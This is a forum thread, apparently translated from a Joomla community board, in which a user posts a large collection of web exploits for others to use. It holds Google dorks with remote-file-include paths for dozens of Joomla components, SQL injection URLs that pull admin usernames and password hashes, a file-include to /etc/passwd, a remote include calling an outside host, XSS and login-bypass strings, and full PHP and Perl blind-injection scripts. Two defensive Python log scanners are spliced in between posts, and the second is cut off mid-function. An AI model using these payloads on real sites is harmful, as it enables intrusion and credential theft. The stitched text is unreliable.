spyman

_.-*Joomla bug bazaar, mixed (they can't be separated; it's all jumbled together)*-._

52 posts in this topic

Posted (edited)

Hello to all friends

Hacking is done through injection and shells

We have dedicated this topic only to Joomla bugs, so that all of you become familiar with all of these kinds of hacks, with closing them on your own site, and with Joomla's problems:

In this topic, the various bugs that are discovered in different CMSs and reported on security sites will be posted.

That way it will be a good, up-to-date and practical database for the folks at joomlaforum.ir, and it will also be quickly accessible!

Announcement

OK, have up to page 5 for now, until my thanks count reaches 135. I have only posted 30% of the bugs so far. If my thanks get there, I will post the rest.

Topic rules:

1- Replies, suggestions and criticism should be posted in the topic _.-*Hacking and security questions*-._ .

2- For hacking tutorials, go to the topic _.-*Step-by-step hacking tutorial*-._ .

4- To keep from getting hacked, go here: _.-*Firewall for Joomla*-._

5- _.-*Penetrating the Joomla content management system, with examples*-._

7- If you agree with a post, just press the thanks button so that the management also learns how many people agree with that item.

8- I do the exercises in the hacking group; those who want to join should send a private message.

Edited by spyman
1 user liked this


Here is the first batch



inurl:"com_admin"

administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_simpleboard
/components/com_simpleboard/file_upload.php?sbp=shell

inurl:"com_hashcash"
/components/com_hashcash/server.php?mosConfig_absolute_path=shell

inurl:"com_htmlarea3_xtd-c"

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell

inurl:"com_sitemap"
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell

inurl:"com_performs"
components/com_performs/performs.php?mosConfig_absolute_path=shell

inurl:"com_forum"
/components/com_forum/download.php?phpbb_root_path=

inurl:"com_pccookbook"
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_extcalendar
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell

inurl:"minibb"
components/minibb/index.php?absolute_path=shell

inurl:"com_smf"
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=shell

inurl:"com_pollxt"
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell

inurl:"com_loudmounth"
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell

inurl:"com_videodb"
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_pcchess
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell

inurl:"com_multibanners"
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell

inurl:"com_a6mambohelpdesk"
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell

inurl:"com_colophon"
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell

inurl:"com_mgm"
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell

inurl:"com_mambatstaff"
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell

inurl:"com_securityimages"
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell

/components/com_securityimages/lang.php?mosConfig_absolute_path=shell

inurl:"com_artlinks"
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell

inurl:"com_galleria"
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell

inurl:"com_akocomment"
/akocomments.php?mosConfig_absolute_path=shell

inurl:"com_cropimage"
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell

inurl:"com_kochsuite"
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell

inurl:"com_comprofiler"
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell

inurl:"com_zoom"
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell

/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell

inurl:"com_serverstat"
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell

inurl:"com_fm"
components/com_fm/fm.install.php?lm_absolute_path=shell

inurl:com_mambelfish
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell

inurl:com_lmo
components/com_lmo/lmo.php?mosConfig_absolute_path=shell

inurl:com_linkdirectory
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=shell

inurl:com_mtree
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell

inurl:com_jim
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell

inurl:com_webring
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell

inurl:com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

inurl:com_babackup
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell

inurl:com_lurm_constructor
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell

inurl:com_mambowiki
components/com_mambowiki/MamboLogin.php?IP=shell

inurl:com_a6mambocredits
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell

inurl:com_phpshop
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=shell

inurl:com_cpg
components/com_cpg/cpg.php?mosConfig_absolute_path=shell

inurl:com_moodle
components/com_moodle/moodle.php?mosConfig_absolute_path=shell

inurl:com_extended_registration
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=shell

inurl:com_mospray
components/com_mospray/scripts/admin.php?basedir=shell

inurl:com_bayesiannaivefilter
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell

inurl:com_uhp
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell

inurl:com_peoplebook
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell

inurl:com_mmp
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell

inurl:com_reporter
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell

inurl:com_madeira
/components/com_madeira/img.php?url=shell

inurl:com_jd-wiki
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell

inurl:com_bsq_sitestats
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
/com_bsq_sitestats/external/rssfeed.php?baseDir=she

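A defender-side check for the request patterns in the list above, as an added example that is not part of the original post: it scans web-server access-log lines for include-path parameters that carry a remote URL, directory traversal or a null byte. It generalizes beyond the listed components to any query parameter; the log lines, hosts and addresses are constructed, and the function and field names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote

# Start of a Combined Log Format line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Parameter names taken from the list above, lower-cased. mosConfig_* are
# server-side Mambo/Joomla 1.0 configuration variables, so a client sending
# one in the query string is abnormal whatever its value.
INCLUDE_PARAMS = {
    "mosconfig_absolute_path", "mosconfig_live_site", "absolute_path",
    "lm_absolute_path", "phpbb_root_path", "basedir", "component_dir",
    "cropimagedir",
}

REMOTE_SCHEME = re.compile(r'^\s*(?:(?:https?|ftps?|php|expect)://|data:)', re.I)
TRAVERSAL = re.compile(r'\.\.[\\/]')

# Constructed sample lines (documentation addresses and example hosts only).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2010:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Mar/2010:10:00:05 +0000] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://files.example.net/x.txt? HTTP/1.1" 200 312',
    '203.0.113.9 - - [10/Mar/2010:10:00:09 +0000] "GET /index.php?option=com_communitypolls&controller=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1423',
    '198.51.100.7 - - [10/Mar/2010:10:01:12 +0000] "GET /index.php?option=com_user&return=http://www.example.com/ HTTP/1.1" 303 0',
    '203.0.113.9 - - [10/Mar/2010:10:02:40 +0000] "GET /components/com_bsq_sitestats/external/rssfeed.php?baseDir=%252e%252e%252fconfiguration.php HTTP/1.1" 404 210',
]


def inspect_value(value):
    """Return the reasons a decoded parameter value looks like an include path."""
    reasons = set()
    # parse_qsl decoded the value once; decode again to catch double encoding.
    for candidate in (value, unquote(value)):
        if REMOTE_SCHEME.search(candidate):
            reasons.add("remote-url")
        if TRAVERSAL.search(candidate):
            reasons.add("path-traversal")
        if "\x00" in candidate:
            reasons.add("null-byte")
    return reasons


def scan(lines):
    """Return one finding per suspicious query parameter, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        path, _, query = m.group("target").partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = inspect_value(value)
            known = name.lower() in INCLUDE_PARAMS
            if known:
                reasons.add("include-param-in-query")
            if not reasons:
                continue
            # A URL in an arbitrary parameter (redirect targets, for example)
            # is only worth a review; a known include parameter or a null
            # byte is not something a normal client sends.
            high = known or "null-byte" in reasons
            findings.append({
                "client": m.group("client"),
                "status": int(m.group("status")),
                "path": path,
                "param": name,
                "reasons": sorted(reasons),
                "severity": "high" if high else "review",
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Requests of this kind only have an effect where PHP lets request parameters overwrite global variables (register_globals or an emulation of it) and remote includes are enabled (allow_url_include, or allow_url_fopen before PHP 5.2), so both should be off on any site still running such components.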

Here is the second one

Security Reason LINK




Topic :
The Joomla ACStartSeite component SQL injection vulnerability

WLB : WLB-2010020103 (About)
SecurityAlert : None
Date : 2010-02-19
Credit : AtT4CKxT3rR0r1ST
SecurityRisk : Medium (About)
Remote : Yes
Local : No
Status : Bug

History : [2010-02-19] Started

Affected software : The Joomla ACStartSeite component

Text :


Joomla Component com_acstartseite Sql Injection Vulnerability
==============================================================
#######
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Home : www.sec-attack.com/vb [sec Attack Team]
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : inurl:"com_acstartseite"

#######

===[ Exploit ]===

www.site.com/index.php?option=com_acstartseite&Itemid=null[sql]&lang=de


www.site.com/index.php?option=com_acstartseite&Itemid=null+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users&lang=de

#######


Here is the third one

Core Joomla Community Polls Component 'controller' Parameter Local File Include Vulnerability

Security Focus LINK



Bugtraq ID: 38330
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Feb 19 2010 12:00AM
Updated: Feb 22 2010 04:02PM
Credit: kaMtiEz
Vulnerable: Core Joomla Community Polls 1.5.2
Not Vulnerable: Core Joomla Community Polls 1.5.3


Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00


4

Amelia CMS remote SQL injection

Security Reason LINK



Topic : Amelia CMS remote SQL injection

WLB : WLB-2010020113 (About)
SecurityAlert : None
Date : 2010-02-23
Credit : Ariko-Security
SecurityRisk : Medium (About)
Remote : Yes
Local : No
Status : Bug

History : [2010-02-23] Started

Affected software : Amelia CMS

Text :

# Title: [sql injection vulnerability in Amelia CMS]
# Date: [10.02.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.ameliadesign.eu/]
# Version: [ALL]
# Tested on: [freebsd / ubuntu]


============ { Ariko-Security - Advisory #3/2/2010 } =============

SQL injection vulnerability in Amelia CMS


Vendors Description of Software:
#
http://www.ameliadesign.eu/index.php?page=1322&lang=eng&cnt=services

Dork:
# N/A

Application Info:
# Name: Amelia CMS
# Versions: ALL

Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: High

Fix:
# N/A

Time Table
# 10/02/2009 - Vendor notified.


Input passed via the "page" parameter to index.php is not properly sanitised before being used in a SQL query and it is possible to get sensitive information using for example Time-Base Blind SQL Injection attacks.


Solution:
# Input validation of "page" parameter should be corrected.


Vulnerability:
#
http://www.[site]/index.php?page=1322[sqli]&lang=eng&cnt=services

Credit:
# Discovered By: MG
# Website: http://Ariko-security.com
Advisory:
#http://www.ariko-security.com/feb2010/ad453.html
# Contacts: support[-at-]ariko-security.com




.

Article Friendly <= SQL Injection Vulnerability

Security Reason Link




Topic : Article Friendly <= SQL Injection Vulnerability

WLB : WLB-2010020122 (About)
SecurityAlert : None
Date : 2010-02-23
Credit : SkuLL-HacKeR
Added by : SecurityReason
SecurityRisk : Medium (About)
Remote : Yes
Local : No
Status : Bug

History : [2010-02-23] Started

Affected software : Article Friendly

Text :

=========
[!] Article Friendly <= SQL Injection Vulnerability
==========

# Author : SkuLL-HacKeR
# Site p4ge : http://www.articlefriendly.com/
# # GreetZ : AmiZya - Stack - djekmani4ever
# Dork : Powered by Article DashBoard #
# Sh0w CreW : Jiko HxH - THE SAD HACKER
# My Home: www.no-exploit.com & # wWw.Owned-m.CoM
# T3st3d on: MacBook & Windows XP SP3

##############

===[ #-/Expl0it Code\-# : ]===

# SQL Injection Vulnerability :

#-/ Link Admin: www.Target.com/[scriptarticleLoser]/admin/

#-/ 0r :
www.Target.com[script-article-Loser]/admin/index.php?filename=adminlogin

#-/Username : admin' or 'a'='a

#-/Password : adminKas0l

##############

http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin
;)


Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability

Link


#!/usr/bin/php
<?php
ini_set("max_execution_time",0);
print_r('
###########################################################################
[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability
###########################################################################
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie
[»] Dork: inurl:index.php?option=com_joomlaconnect_be
###########################################################################
###########################################################################
#
# Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit
# [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3
#
#
###########################################################################
');
if ($argc > 1) {
    $url = $argv[1];
    $r = strlen(file_get_contents($url."+and+1=1--"));
    echo "\nExploiting:\n";
    $w = strlen(file_get_contents($url."+and+1=0--"));
    $t = abs((100-($w/$r*100)));
    echo "Username: ";
    for ($i=1; $i <= 30; $i++) {
        $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
        if (abs((100-($laenge/$r*100))) > $t-1) {
            $count = $i;
            $i = 30;
        }
    }
    for ($j = 1; $j < $count; $j++) {
        for ($i = 46; $i <= 122; $i=$i+2) {
            if ($i == 60) {
                $i = 98;
            }
            $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
            if (abs((100-($laenge/$r*100))) > $t-1) {
                $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
                if (abs((100-($laenge/$r*100))) > $t-1) {
                    echo chr($i-1);
                } else {
                    echo chr($i);
                }
                $i = 122;
            }
        }
    }
    echo "\nPassword: ";
    for ($j = 1; $j <= 49; $j++) {
        for ($i = 46; $i <= 102; $i=$i+2) {
            if ($i == 60) {
                $i = 98;
            }
            $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
            if (abs((100-($laenge/$r*100))) > $t-1) {
                $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
                if (abs((100-($laenge/$r*100))) > $t-1) {
                    echo chr($i-1);
                } else {
                    echo chr($i);
                }
                $i = 102;
            }
        }
    }
}
?>



Title: phpBazar <= 2.1.0 Multiple vulnerabilities
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1  

link

An example

http://www.eaa-mauritius.com/phpBaza...member&value=1

By the way, you can also use the dorks from other sites.


There is this too, a batch without examples

# googledork : "Calendar programming by AppIdeas.com" filetype:php

http://[sERVER]/[PATH]/week.php?LoName=<script>alert(67)</script>

http://[sERVER]/[PATH]/month.php?LoName=<script>alert(788)</script>

http://[sERVER]/[PATH]/event.php?AddressLink="><script>alert(6767)</script><"

SQL Injections:

http://[sERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[sERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[sERVER]/[PATH]/event.php?ID=(1=1)

 

http://[sERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[sql]

http://[sERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [sql]

http://[sERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [sql]

http://[sERVER]/[PATH]/admin/delCategory.php?LocationID=x' [sql]


WebAdministrator Lite CMS SQL Injection Vulnerability

LINK


============ { Ariko-Security - Advisory #5/2/2010 } =============

SQL injection vulnerability in WebAdministrator Lite CMS


Vendor's Description of Software:
# http://jskinternet.pl/portal/jsk/3/Oferta.html

Dork:
# webadministrator lite

Application Info:
# Name: WebAdministrator Lite CMS
# Versions: LITE

Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: medium

Fix:
# N/A

Time Table:
# 25/02/2010 - Vendor notified.
# 25/02/2010 - Vendor response "we will not release FIX for LITE, soon new version"....


Input passed via the "s" parameter to download.php is not properly sanitised before being used in a SQL query.

Solution:
# Input validation of "s" parameter should be corrected.


Vulnerability:
# http://[site]/download.php?s=[sqli]&id=2324

Credit:
# Discovered By: MG
# Website: http://Ariko-security.com
# Contacts: support[-at-]ariko-security.com


Ariko-Security
Maciej Gojny
vuln@ariko-security.com
tel.: +48512946012 (Mo-Fr 10.00-20.00 CET)



Joomla 1.5.15 Persistant XSS in 'Author Alias'

Security Reason





Topic : Joomla 1.5.15 Persistant XSS in 'Author Alias'

WLB : WLB-2010020137 (About)

SecurityAlert : None
Date : 2010-02-26

Credit : coffey
Added by : SecurityReason
SecurityRisk : Low (About)
Remote : Yes
Local : No
Status : Bug

History : [2010-02-26] Started


Affected software : Joomla 1.5.15





Text :

date -------------[ 24.02.2010
prog -------------[ Joomla 1.5.15
vuln -------------[ Persistant XSS in 'Author Alias'
source -------------[ www.joomla.org
by -------------[ coffey

poc
Persistant XSS in 'Author Alias' when adding new Article (logged only).

/administrator/index.php?option=com_content&sectionid=0&task=edit&cid[]=46

$details_created_by_alias="><script>alert(1)</script>



PBBoard 2.0.5 add administrator and shell upload vulnerabilities

Security Reason



Topic : PBBoard 2.0.5 add administrator and shell upload vulnerabilities

WLB : WLB-2010020135 (About)

SecurityAlert : None
Date : 2010-02-26

Credit : indoushka
SecurityRisk : High (About)
Remote : Yes
Local : No
Status : Bug

History : [2010-02-26] Started


Affected software : PBBoard 2.0.5





Text :

========================================================================================
| # Title : PBBoard Version 2.0.5 Mullti Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iq-ty.com
| # Web Site : http://www.pbboard.com/PBBoard_v2.0.5.zip
| # Dork : Powered by PBBoard© 2009 Version 2.0.5
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Mullti
====================== Exploit By indoushka =================================
# Exploit :

1- Add Admin:

http://127.0.0.1/upload/setup/install/?step=4

2- upload Vulnerability:

After register go to

http://127.0.0.1/upload/index.php?page=usercp&control=1&avatar=1&main=1

After Upload go to 2 find

http://127.0.0.1/Upload/download/avatar/(Ev!l name.php)

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix
==========================================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir)
SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z
(www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r
IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me *
www.mormoroth.net
www.alkrsan.net * www.kadmiwe.net * www.arhack.net
---------------------------------------------------------------------------
-----------------------------------



Joomla Component com_hdflvplayer SQL injection exploit


#!/usr/bin/perl -w

###############################################################################################
#
# [~] Joomla Component com_hdflvplayer SQL injection exploit - (id)
# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage : http://www.indonesiancoder.com
# [~] Date : 15 February, 2010
#
###############################################################################################
#
# [ Software Information ]
#
# [+] Vendor : http://www.hdflvplayer.net/
# [+] Price : $ 99.00
# [+] Vulnerability : SQL injection
# [+] Dork : inurl:"CIHUY"
# [+] Type : commercial
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";

use LWP::UserAgent;

print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);

$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";

$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}



WSC CMS (Bypass) SQL Injection Vulnerability

Security Reason





Topic : WSC CMS (Bypass) SQL Injection Vulnerability

SecurityAlert : 7045
CVE : CVE-2010-0698
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Phenom
Published : 26.02.2010

Affected Software : dynamicsoft:wsc_cms:2.2

Advisory Content :

# Exploit Title: WSC CMS (Bypass) SQL Injection Vulnerability
# Date: 2010-02-19
# Author: Phenom
# Software Link:
# Version:
# Tested on: windows xp sp3
# CVE :
# Code :

------------------------------------------------------
------------------------------------------------------

_____ _
| __ | |
| |__) | |__ ___ _ __ ___ _ __ ___
| ___/| '_ \ / _ \ '_ / _/| '_ ` _ \
| | | | | | __/ | | | (_) | | | | | |
|_| |_| |_|\___|_| |_|\/__/|_| |_| |_|


------------------------------------------------------
------------------------------------------------------

############### WSC CMS (Bypass) SQL Injection Vulnerability
###################################
#
# Author : Phenom
#
# mail : sys.phenom.sys[at]gmail[dot]com
#
# Dork : Realizzato con WSC CMS by Dynamicsoft
#
####### Exploit
#############################################################
#
# 1- http://server/public/backoffice
#
# 2- login with "admin" as user name and 'or as password
#
#############################################################


Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability

Security Reason





Topic : Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability

SecurityAlert : 7043
CVE : CVE-2010-0694
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : FL0RiX
Published : 26.02.2010

Affected Software : percha:com_perchagallery:1.4 and previous versions

Advisory Content :

# Joomla Component com_perchagallery SQL Injection Vulnerability

# Author :FL0RiX

#

# Name : com_perchagallery
#
# Bug Type : SQL Injection

#

# Infection : Admin login information can be obtained.

#

# Demo Vuln :
#
#
http://www.community.phoenixmbs.com/index.php?option=com_perchagallery&view=editunidad&id=[EXPLOIT]
#
#EXPLOIT :
null/**/union/**/select/**/1,concat(username,0x3a,password)fl0rix,3,4,5,6/**/from/**/jos_users--

########################################################################


Joomla Component com_yanc SQL Injection Vulnerability

LINK


==============================================================================
[»] Joomla com_yanc Remote Sql Injection Vulnerability
==============================================================================

[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ]
[»] Dork: [inurl:index.php?option=com_yanc "listid" ]
###########################################################################
===[ Exploit ]===

[»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
[»]Author: Snakespc <-
###########################################################################



Joomla Component com_liveticker Blind SQL Injection Vulnerability

LINK


#!/usr/bin/php
<?php
ini_set("max_execution_time",0);
print_r('
#####################################################################
[»] Joomla com_liveticker Remote Blind Injection Vulnerability
#####################################################################
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com ]
[»] Site: [ sec-war.com/cc>]
[»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie
[»] Dork: [ inurl:index.php?option=com_liveticker "viewticker" ]
######################################################################
######################################################################
# Joomla com_liveticker (tid) Blind SQL Injection Exploit
# [x] Usage: Snakespc.php "http://url/index.php?option=com_liveticker&task=viewticker&tid=1"
######################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>


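Both blind-injection scripts in this thread (com_joomlaconnect_be and com_liveticker) send one request per comparison, so the extraction is visible in the access log. The following added example, which is not part of the original posts, groups such requests per client and injected parameter and reports which table and column were read and how far the character position advanced; the log lines are constructed and the function and field names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Start of a Combined Log Format line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*" \d{3} '
)

# ascii(substring((select <column> from <table> ...),<position>,1))
PROBE_RE = re.compile(
    r'ascii\s*\(\s*(?:substring|substr|mid)\s*\(\s*\(\s*select\s+'
    r'(?P<column>\w+)\s+from\s+(?P<table>\w+)[^)]*\)\s*,\s*'
    r'(?P<pos>\d+)\s*,\s*1\s*\)\s*\)',
    re.I,
)
# The "and 1=1--" / "and 1=0--" pair used to measure true and false responses.
CALIBRATION_RE = re.compile(r'\band\s+1\s*=\s*[01]\s*--', re.I)

# Constructed sample: one client walking character positions, one normal visitor.
_REQ = ('{ip} - - [05/Mar/2010:02:14:{sec:02d} +0000] "GET /index.php?option=com_liveticker'
        '&task=viewticker&tid=1{tail} HTTP/1.0" 200 {size}')
_SUB = "+and+ascii(substring((select+{col}+from+jos_users+limit+0,1),{pos},1)){cmp}--"
_TAILS = ["+and+1=1--", "+and+1=0--"] + [
    _SUB.format(col=col, pos=pos, cmp=cmp) for col, pos, cmp in [
        ("username", 1, "!=0"), ("username", 1, "%3E46"), ("username", 1, "%3E98"),
        ("username", 2, "%3E46"), ("password", 1, "%3E46"), ("password", 1, "%3E48"),
        ("password", 2, "%3E46"), ("password", 3, "%3E46"),
    ]
]
SAMPLE_LOG = [
    _REQ.format(ip="203.0.113.50", sec=i, tail=tail, size=8412 if i % 2 == 0 else 6120)
    for i, tail in enumerate(_TAILS)
]
SAMPLE_LOG.append(_REQ.format(ip="198.51.100.7", sec=30, tail="", size=8412))


def summarize_blind_sqli(lines, min_probes=5):
    """Report clients that sent at least min_probes character-probe requests."""
    sessions = defaultdict(
        lambda: {"probes": 0, "calibration": 0, "positions": defaultdict(set)}
    )
    for line in lines:
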